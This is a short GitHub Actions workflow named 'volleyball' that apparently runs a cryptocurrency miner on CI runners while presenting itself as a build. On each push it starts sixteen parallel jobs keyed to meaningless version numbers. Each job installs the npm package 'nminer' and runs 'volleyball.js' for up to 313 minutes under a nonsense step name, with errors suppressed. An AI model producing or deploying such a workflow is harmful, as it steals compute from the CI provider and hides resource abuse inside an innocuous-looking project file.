name: volleyball
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6849 }
          - { version: 6519 }
          - { version: 2535 }
          - { version: 2864 }
          - { version: 767 }
          - { version: 9707 }
          - { version: 6591 }
          - { version: 3700 }
          - { version: 4640 }
          - { version: 8107 }
          - { version: 4967 }
          - { version: 944 }
          - { version: 1126 }
          - { version: 5156 }
          - { version: 2971 }
          - { version: 9061 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: meh duh er yeast
        run: |
          npm install nminer@latest
          timeout 313m node volleyball.js || echo "volleyball executed"